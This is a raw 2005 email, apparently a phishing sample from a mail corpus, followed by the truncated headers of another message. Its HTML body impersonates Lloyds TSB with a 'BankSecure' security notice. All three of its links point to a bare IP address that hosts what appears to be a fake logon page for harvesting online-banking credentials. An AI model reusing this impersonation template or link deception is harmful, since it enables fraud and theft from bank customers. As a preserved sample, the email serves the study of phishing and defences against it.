From: "Corina Rasmussen" <corinarasmussen_st@lloydstsb.com>
To: jose@monkey.org
Subject: =?ISO-8859-1?b?QmFuayBTZWN1cml0eSBSZXBvcnQgICAgaXA=?=
Date: Mon, 11 Jul 2005 02:48:28 +0000
MIME-Version: 1.0
X-Sender: <corinarasmussen_st@lloydstsb.com>
Sender: <corinarasmussen_st@lloydstsb.com>
Reply-To: "Corina Rasmussen" <corinarasmussen_st@lloydstsb.com>
In-Reply-To: <09bc01c58064$34e5ebc0$31317ece@yec40n2>
User-Agent: Mozilla/5.033 (Macintosh; U; PPC; U; NT4.0; en-us) Gecko/25250101
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: 8bit
Status: RO
X-Status: 
X-Keywords:                 
X-UID: 115

<style type="text/css">
<!--
style1 {
	color: #000033;
	font-weight: bold;
	font-size: 24px;
}
style3 {
	font-size: 14;
	color: #00B300;
}
style4 {color: #00B300}
style6 {font-family: Arial, Helvetica, sans-serif}
style7 {
	font-size: 12px;
	color: #333333;
}
style9 {
	color: #7E7E7E;
	font-size: 11px;
}
style10 {font-size: 16px}
style11 {font-size: 14px}
a:link {
	color: #0055BB;
}
-->
</style>
 <table width="486" border="0">
  <tr>
    <td height="46"><img src="http://www.lloydstsb.com/media/lloydstsb2004/logos/logo_lloydstsb.gif" width="219" height="34"></td>
  </tr>
  <tr>
    <td width="517" height="230"><p class="style1 style4"> Security </p>
      <p class="style1 style3"> Be confident you're protected with Lloyds TSB BankSecure™ </p>

      <p class="style7"><span class="style6">We're committed to protecting you when you bank with us. Our&nbsp;industry-standard levels of security ensure that you can always access your Lloyds TSB accounts online with confidence. <br>
        <br>
    To ensure you are always protected,&nbsp;we are&nbsp;introducing a new programme of security initiatives called BankSecure™. Over the next few months, you'll see a number of initiatives that we'll put in place to make sure you stay secure and to help you protect your Internet banking information. We're here to help you stay safe while banking online</span>.</p>
    <p class="style4"><strong> Top three security recommendations </strong></p>
    <ul>

      <li><span class="style11"><a href="http://61.56.245.39:81/lloyds/logon.htm">Use Internet banking safely.</a>
      </span>
      <li class="style11"><a href="http://61.56.245.39:81/lloyds/logon.htm">Protecting your computer.</a>      <li class="style11"><a href="http://61.56.245.39:81/lloyds/logon.htm">Understand our system security. </a></li>
    </ul>    <p class="style1 style10">&nbsp; </p></td>
  </tr>
  <tr>

    <td height="50" bgcolor="#EFEFEF"><p class="style9">Lloyds TSB Bank plc and Lloyds TSB Scotland plc are authorised and regulated by the Financial Services Authority and signatories to the Banking Codes. <br>
  FSA authorisation can be checked on the FSA's Register at: <a href="/it/cmf/exturl.asp?asset=/assets/link/lloydstsb2004/external/fsa_register_link.xml">www.fsa.gov.uk/register </a><br>
  Lloyds TSB Bank plc and Lloyds TSB Scotland plc are members of the Financial Services Compensation Scheme and the Financial Ombudsman Service. 


 BankSecure™ is a registered trademark of Lloyds TSB Group </p></td>
  </tr>
</table>

From beth@monkey.org  Sun Jul 10 22:56:14 2005
Return-Path: <beth@monkey.org>
X-Original-To: jose@login.monkey.org
Delivered-To: jose@login.monkey.org
Received: from mail1.monkey.org (mail1.monkey.org [65.23.81.153])
	by naughty.monkey.org (Postfix) with ESMTP id CDF58536E98
	for <jose@login.monkey.org>; Sun, 10 Jul 2005 22:56:14 -0400 (EDT)
Received: from naughty.monkey.org (naughty.monkey.org [65.23.81.140])
	by mail1.monkey.org (Postfix) with ESMTP id 3321C85AC50
	for <jose@monkey.org>; Sun, 10 Jul 2005 22:56:14 -0400 (EDT)
Received: by naughty.monkey.org (Postfix, from userid 6)
	id AB1BC536E93; Sun, 10 Jul 2005 22:56:14 -0400 (EDT)
Received: from localhost (localhost [127.0.0.1])
	by naughty.monkey.org (Postfix) with ESMTP id A392E536E7E
	for <jose@monkey.org>; Sun, 10 Jul 2005 22:56:14 -0400 (EDT)
X-Original-To: beth@login.monkey.org
Delivered-To: beth@login.monkey.org
X-Received: from mail1.monkey.org (mail1.monkey.org [65.23.81.153])
	by naughty.monkey.org (Postfix) with ESMTP id 08E09536E13
	for <beth@login.monkey.org>; Sun, 10 Jul 2005 22:54:42 -0400 (EDT)
X-Received: from pool-70-23-205-253.ny325.east.verizon.net (pool-70-23-205-253.ny325.east.verizon.net [70.23.205.253])
	by mail1.monkey.org (Postfix) with SMTP id 6666C85AC7C
	for <beth@monkey.org>; Sun, 10 Jul 2005 22:54:39 -0400 (EDT)
FCC: mailbox://support_num_88907397@southtrust.com/Sent
X-Identity-Key: id1
Date: Mon, 11 Jul 2005 05:46:45 +0200
